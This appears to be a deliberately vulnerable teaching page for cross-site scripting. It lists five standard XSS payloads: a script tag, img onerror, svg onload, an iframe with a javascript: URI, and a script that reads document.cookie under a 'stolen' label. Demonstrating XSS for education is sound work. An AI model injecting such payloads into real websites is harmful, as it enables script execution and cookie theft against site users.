This page is intentionally vulnerable to demonstrate XSS attacks for educational purposes!
If you see an alert or other script execution, the XSS attack worked!
<script>alert('XSS!')</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src=javascript:alert('XSS')>
<script>document.cookie='stolen='+document.cookie</script>